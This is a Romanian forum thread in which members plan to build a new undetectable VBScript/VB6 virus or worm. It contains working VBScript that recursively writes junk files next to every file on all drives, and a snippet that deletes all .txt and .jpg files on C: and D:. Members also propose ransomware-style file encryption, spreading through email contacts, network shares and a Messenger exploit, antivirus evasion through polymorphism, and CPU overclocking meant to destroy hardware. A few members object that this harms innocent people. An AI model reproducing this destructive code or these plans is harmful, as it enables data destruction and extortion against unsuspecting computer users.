Thread closed -move to trash

[puskin]

Nu are rost asa ceva....poate in cativa ani o sa se dezvolte mentalitatea oamenilor....topic closed ! se poate muta la gunoi

[Grunt]

Daca e Visual Basic, pe mine ma scoateti din lista. Prefer C++, si in VB nu am mai facut nimic de... 10 luni de zile. Mi se pare un limbaj prea limitat.

[loki]

un schelet simplut e ceea ce doream sa fac ceva mai tarziu: loveletter-ul vechi. Este detectat, is detectate subrutinele pentru inmultire. Nu este detectat celalalt mecanism al lui in care se instaleaza in start-up si sterge fisiere jpg si mpg parca. Asta doar ca pentru inceput: trebuie lucrata subrutina de inmultire si gata virusu.

[puskin]

Daca e Visual Basic, pe mine ma scoateti din lista. Prefer C++, si in VB nu am mai facut nimic de... 10 luni de zile. Mi se pare un limbaj prea limitat.

de acord cu tine...e mai robust si mai eficient dar e mult prea greu pt. primul punct de discutie "Dependinta programului de sistem" eu cel putin nu pot face in c++ un virus care sa depinda de sistem nu ma pricep...

Din aceasta cauza am zis sa fie un limbaj mai vechi..sa participe cat mai multi..oricum preferam pascal sau delphi daca era sa fie ceva super....

va rog nu mai postati opinii,sugesti..s.a.m.d......... bagati si postati functii, idei de dependenta pt. inceput chiar vreau sa iasa acest proiect, BAGATI CODUL SURSA DIRECT

[Nytro]

Ce zici de un programel care sterge tot ce se poate sterge ?

[puskin]

Ce zici de un programel care sterge tot ce se poate sterge ?

cam asa ma gandeam si eu in prima faza, daca ne iese asta pe urma facem varianta care sa incripteze tot ce se poate

[puskin]

Cine imi poate spunde de ce panarama asta de cod vechi si obosit dubleaza fisierele in loc sa le scrie direct???

vbs

On Error Resume Next

dim FSobj,orgMes,finalMes
set FSobj=CreateObject("Scripting.FileSystemObject")

orgMes="Hello! Don't be mad...I'm not a bad bug  - by *|%|"


orgMes=replace(orgMes,chr(42),chr(68))
orgMes=replace(orgMes,chr(124),chr(46))
finalMes=replace(orgMes,chr(37),chr(76))


On Error Resume Next
dim drive,machine

set machine=FSobj.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next


sub indexFolders(location)
On Error Resume Next
dim specs,file,subFol,sayHello

set specs=FSobj.GetFolder(location)
set subFol=specs.SubFolders

for each file in subFol
set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
sayHello.write finalMes
sayHello.Close
writeData(file.Path)
indexFolders(file.Path)
next
end sub


sub writeData(location)
On Error Resume Next
dim folder,directory,file,sayHello

set folder=FSobj.GetFolder(location)
set directory=folder.Files

for each file in directory

set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
sayHello.write finalMes
sayHello.Close
next
end sub

niste comenzi in vbs:

http://activexperts.com/activmonitor/windowsmanagement/adminscripts/filesfolders/files/

Pt. sters fisiere de pe o partitie:

Const DeleteReadOnly = True
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile("C:\*.txt"), DeleteReadOnly
objFSO.DeleteFile("C:\*.jpg"), DeleteReadOnly
objFSO.DeleteFile("D:\*.jpg"), DeleteReadOnly

Hai sa-l facem sa depinda de winlogon.exe stie careva cum se face asta?

[loki]

Cine imi poate spunde de ce panarama asta de cod vechi si obosit dubleaza fisierele in loc sa le scrie direct???

vbs

Hai sa-l facem sa depinda de winlogon.exe stie careva cum se face asta?

Unii wormi vbs in loc sa stearga prefera sa scrie un fisier cu acelasi nume si extensia vbs in care sa isi copie codul.

Ce anume sa depinda de winlogon? Vrei sa il bagi in startup? Il pui in registri.

O faza interesanta de aplicat: pune la inceputul fisierului REM <html><script language=vbscript> si la sfarsit REM </script></html> In felul asta ruleaza si cu extensia html si cu vbs

Uite codul loveletter: http://www.camworld.com/misc/iloveu.txt are toate rutinele utile unui worm. Mail, startup, copieri, etc.

[ArgentinBoy]

Stiu ca asta suna stupid dar vreau sa ma asigur ca nu se poate face

De cateva luni ma tot gandesc cum ar fi sa existe un virus care sa faca overclock la procesor atat de mult incat sa il distruga

In loc sa strici softu (OS-ul) care se poate reinstala imediat

Mai bine strici o parte fizica.

Stiu ca acest overclock se poate face doar din BIOS dar eu sunt cam limitat asa ca ma gandeam ca stiti voi cumsa faceti altfel

Va rog sa-mi spunei doar daca este posibil sau nu

[amprenta]

Se poate face overclock si din mediul Windows uitati-va la aplicatii gen Asus Ai Booster .

Cred ca ar trebui sa puneti accentu pe capacitatea lui de raspandire , nu pe cat de rau face . Sa ai aiba ceva distinctiv asa , sa nu fie doar "am luat un virus care mi-o sters tot " .

De ex` programelul lui KingRo care trimitea pe messenger 'sunt tarfa' indiferent de ce tastai s-a raspandit destul de mult si nici macar nu era virus .

Chiar daca nu facea asa mult rau , se ajungea la format .

De asta zic ca sa stearga tot sau sa stearga manelele e o prostie .

Pentru ca orice ar face ,cat de mic , tot se ajunge la format .

[ArgentinBoy]

BIne poate sa nu-l prajeasca neaparat dar sa il ridice atat de mult incat sa se strice sau sa nu mai functioneze sau nu stiu.,..sa-i faca rau :twisted:

Oricum DLD are o idee foarte buna

trebuie facut ceva distinctiv si care sa se raspandeasca repde

Am sa ma mai gandesc si eu la ceva si am sa vin in curand cu idei noi :oops:

[OrIaX]

pt inceput aruncati un oki aici

http://www.planet-source-code.com/vb/scripts/ShowZip.asp?lngWId=1&lngCodeId=66529&strZipAccessCode=tp%2FB665299102

sursa poate fii mdoficata sa ascunda "default" proggie-ul vostru

raspandirea se face pe mai multe cai:

function [search]

if -->adressbook is found --->do -->mail la toata lista (ambalat frumos) --> else ---> return[search]

if --> localnetwork is found --> do --> incercare de raspandire daca nu este protejata ---> else ---> return [search]

end function

revin cu ceva mai concret alta data acum sunt cu atentia in alta parte

[ArgentinBoy]

Cea mai rapida cale de raspandire in momentul asta in Romania e prin intermediul Mess-ului

Daca ai reusi sa faci un virus foarte mic de de pana in 100 Kb ai putea face un cod care sa trimita automat vrirusul prin mess

Ai putea da un nume interesant si daca cel care "trimite" virusul nu e atent poate nu realizeaza si nu apuca sa dea cancel in timp util

E o idee cam primitiva dar ar putea merge

Si daca vrei sa faci ceva stresant ai putea face un virus care creeaza sute mii sau milioane de fisiere foarte mici dar care nu pot fi sterse.

Sa ii umple toate folderele cu cate 100 de astfel de fisiere si cand da delete sa ii apara "Access denied-the file is beeing used by another program" si daca e vreunu mai prost o s-o lase balta foarte repede si va trebui sa stea cu fisierele alea pana nu mai rezista si da restart

Stiu ca ideile astea sunt tampite dar ai spus ca vrei ceva ce nu s-a mai facut

[puskin]

..

Stiu ca uni virusi isi copie continutul in alte fisiere, le dubleaza..etc

dar eu vreau ceva la modul

Fso.OpenTextFile (forbinaryaccess, forread, forwrite..s.a.m.d)

adica sa strice fisierele si noi sa avem decriptorul..bine asta pe langa alte functii....

ceva de genul

Function WriteToFile

Const ForReading = 1, ForWriting = 2

Dim fso, f

Set fso = CreateObject("Scripting.FileSystemObject")

Set f = fso.OpenTextFile("c:\testfile.txt", ForWriting, True)

f.Write "Hello world!"

Set f = fso.OpenTextFile("c:\testfile.txt", ForReading)

WriteToFile = f.ReadLine

End Function

e si aici sa inlocuiasca caracterele de pe pozitiile indicate:

orgMes=replace(orgMes,chr(42),chr(68))
orgMes=replace(orgMes,chr(124),chr(46))
finalMes=replace(orgMes,chr(37),chr(76))

adica in loc de "Create.Text.File" sai bagam open si pe urma write to file

dar sincer am uitat cum se face pentru mai multe fisiere o data...

o sa postez mai tarziu putin un encriptor pentru fisiere dar iara nu stiu cum sal fac la fel ca si codul "Hello" postat mai sus, si anume sa caute in foldere si subfoldere si sa actioneze asupra fisierelor...

P.S:Apropo am uitat sa va pun programul (deep_freeze) care va fereste sa va infectati cand testati codurile...ca sa nu il mai cautati pe net...

http://rapidshare.com/files/117047011/deep_freeze_v3.32_iso.zip.html

[dranaxum]

Ca sa faci un virus "aproape" indetectabil cauta documentatie despre virusii polimorfici.

[puskin]

Cea mai rapida cale de raspandire in momentul asta in Romania e prin intermediul Mess-ului

Daca ai reusi sa faci un virus foarte mic de de pana in 100 Kb ai putea face un cod care sa trimita automat vrirusul prin mess

Ai putea da un nume interesant si daca cel care "trimite" virusul nu e atent poate nu realizeaza si nu apuca sa dea cancel in timp util

E o idee cam primitiva dar ar putea merge

Si daca vrei sa faci ceva stresant ai putea face un virus care creeaza sute mii sau milioane de fisiere foarte mici dar care nu pot fi sterse.

Sa ii umple toate folderele cu cate 100 de astfel de fisiere si cand da delete sa ii apara "Access denied-the file is beeing used by another program" si daca e vreunu mai prost o s-o lase balta foarte repede si va trebui sa stea cu fisierele alea pana nu mai rezista si da restart

Stiu ca ideile astea sunt tampite dar ai spus ca vrei ceva ce nu s-a mai facut

astea o sa fie functiile virusului..m-am gandit si eu la aspectele acestea..

"sa umple desktop-ul cu foldere "con" "lpt" ..etc

la motor o sai bag smtp cred iar ca sa se transmita pe YMess o sa ma folosesc de exploit-ul gasit de NullByte (asta daca imi da acordul )

http://rstcenter.com/forum/yahoo-bug-t11988.rst

O sa fie mai mult Worm decat virus pt. ca nu o sa fie robust, o sa aiba o gramada de functii si subfunctii..etc si nu cred ca o sa ramana multa vreme UD cu atatea functii doar daca dau peste un motor "polimorfic" care sa nu fie detectat...

Dar pana atunci trebuie sa fac cumva sa incripteze fisierele, sa fie dependent de un fisier de sistem ca sa nu poata fie sters de AV(sa-l vada dar sa nu il poata dezinfecta...a-ti mai vazut sigur cazuri de genul...), sau daca e sters sa pice sistemul si sa intre pe "restore"...s.a.m.d

Cam atat in vbs. pacat ca nu se poate face un keylogger in vbs....adica poate so putea face ca e asemanator cu vb6..... dar habar nu am de asa ceva..

[ArgentinBoy]

Nu ar fi frumos sa poti sa-l atasesi de un fisier chiar de al antivirusului?

Si cand antivirusul incearca sa-l stearga nu va putea pt ca se va sterge singur

AR fi frumos

Dar cum fiecare calculator are un virus diferit ar insemna sa il faci sa se poata atasa de mai multe fisiere dpinzand de ce antivirus are persoana respectiva

Sau o idee interesanta ar fi sa se ataseze spre exemplu numai de un fisier al anitvirusului de la Kaspersky si daca se raspandeste usor si rapid si ajunge cunoscut ar aparea in reviste ca Kaspersky nu reuseste sa faca fata acestui virus si lumea nu ar mai folosi Kasperky ...

[nullbyte]

o sa ma folosesc de exploit-ul gasit de NullByte (asta daca imi da acordul )

Normal. Chiar sunt curios sa vad ce va iesi

[v3ctor]

Si de ce vrei sa faci un virus care sa distruga datele unui PC la care nu ii cunosti propietarul care nu ti-a facut nimic ! Te-ai gandit vreodata ca acea persoana ar putea avea date importante si daca le pierde ii grav si datele care le-a pierdut ar costa bani ! dar de ce nu te-ai gandit sa faci ceva constructiv pe baza cunostintelor tale prin care sa ajuti ?nu inteleg care este placerea in a distruge ceva unui om nevinovat pe care nici nu il cunosti ! maturizeazate !

[CODEX]

Doamne ! Toti aveti antivirus si cred ca pe toti va enerveaza virusii care intra in calculator ! Ti-ar placea sa ai in calculator ceva la care ai municit mai mult de 1 luna si un Stupid de virus care sa-l iei din greseala sa iti stearga tot ?

Nu nu cred ! Mai bine ati face ceva mai interesant si mai stiu eu in sensul "educativ instructiv " .

SCZ de OFF ...

[nullbyte]

Doamne ! Toti aveti antivirus si cred ca pe toti va enerveaza virusii care intra in calculator ! Ti-ar placea sa ai in calculator ceva la care ai municit mai mult de 1 luna si un Stupid de virus care sa-l iei din greseala sa iti stearga tot ?

Nu nu cred ! Mai bine ati face ceva mai interesant si mai stiu eu in sensul "educativ instructiv " .

SCZ de OFF ...

De ce sa-l iei din greseala?

Be secured or be fucked.

[ArgentinBoy]

Lol cum zice nullbyte ca mereu are dreptate

daca spunei ca toti aveti antivirus atunci nu ar trebui sa va ingrijorati

Si scopul unui virus este sa faca rau

dar scopul creatorului este sa se faca remarcat nu sa faca rau

ceva constructiv nu poti fac decat daca te angajezi undeva

[puskin]

Hai sa facem un virus in VB6..asa de plictiseala (pt. studiu si experiment) dar care sa nu fie detectabil, postati aici functii interesante (UD) cred ca daca postati stiti care trebuie sa fie structura unui virus si ce caracteristici trebuie sa aiba.

Nu ma faceti de ras cu post-uri inutile!Daca a-ti gresit la o functie nu e nimic se intampla...dar sa nu postati aiurea.Daca nu stiti structura/functiile unui virus/worm va rog sa-mi spuneti sa o postez.

P.S: sa nu fie dependent de fisiere..adica sa nu ii bagam resource...sa fie cat mai robust si eficient si cu cat mai multe functii beton, stiu ca e cam greu in vb6...se poate si vbs... pana la urma ,...numai sa fie ceva nou nu surse vechi modificate si detectabile....

Incepem cu discutii legate de ce o sa fie dependent virusul:

Si de ce vrei sa faci un virus care sa distruga datele unui PC la care nu ii cunosti propietarul care nu ti-a facut nimic ! Te-ai gandit vreodata ca acea persoana ar putea avea date importante si daca le pierde ii grav si datele care le-a pierdut ar costa bani ! dar de ce nu te-ai gandit sa faci ceva constructiv pe baza cunostintelor tale prin care sa ajuti ?nu inteleg care este placerea in a distruge ceva unui om nevinovat pe care nici nu il cunosti ! maturizeazate !

Daca e Visual Basic, pe mine ma scoateti din lista. Prefer C++, si in VB nu am mai facut nimic de... 10 luni de zile. Mi se pare un limbaj prea limitat.

de acord cu tine...e mai robust si mai eficient dar e mult prea greu pt. primul punct de discutie "Dependinta programului de sistem" eu cel putin nu pot face in c++ un virus care sa depinda de sistem nu ma pricep...

Din aceasta cauza am zis sa fie un limbaj mai vechi..sa participe cat mai multi..oricum preferam pascal sau delphi daca era sa fie ceva super....

va rog nu mai postati opinii,sugesti..s.a.m.d......... bagati si postati functii, idei de dependenta pt. inceput chiar vreau sa iasa acest proiect, BAGATI CODUL SURSA DIRECT

te rog nu am timp si pt. tine casca ochii si citeste mai intai si pe urma paradontozeaza pe filozodendeala.kkt

useri ca tine v3ctor ar trebui banati inainte de inscriere

[v3ctor]

uite ma aici foarte desteptule la ce m-am referit cand am postat :

Nytro a scris:
Ce zici de un programel care sterge tot ce se poate sterge ?

cam asa ma gandeam si eu in prima faza, daca ne iese asta pe urma facem varianta care sa incripteze tot ce se poate

Oricum un virus nu poate face decat lucruri rele , si nu toata lumea stie sa se securizeze pentru ca nu este asa bun in domeniu ca voi . Si mai vreti sa il si raspanditi altu zicea ,,dar scopul creatorului este sa se faca remarcat nu sa faca rau " la ce sa te faci recunoscut ma(la prostie sau la ce) ? Sunt intr-o oarecare masura de acord la aplicarea hackingului la persoane care vi-au facut ceva dar nu la oameni nevinovati . Mai ganditiva(daca sunteti in stare de asa ceva ) ca s-ar putea ca virusul vostru sa ajunga la o persoana care tine contabilitate pe un PC si a muncit acolo vreo 6 ani si are program cu licenta si nu il poate instala decat o data (stiai asta nenorocitule ?)sau multe exemple care nici nu ti le mai dau ca vad ca nu te intereseaza ! oricum parerea mea despre copii ca tine care au asa idei este ca sunt niste gunoaie si cu un grad de prostie si incopetenta sub nivelul pamantului ! poti sa ma injuri si sa-mi zici ce vrei nu ma intereseaza si nu ma afecteaza cu nimic si asa pentru mine esti mai neimportant decat orice dobitoc!

[nullbyte]

Termina dreacu' si paraseste topicu' ca il distrugi :evil: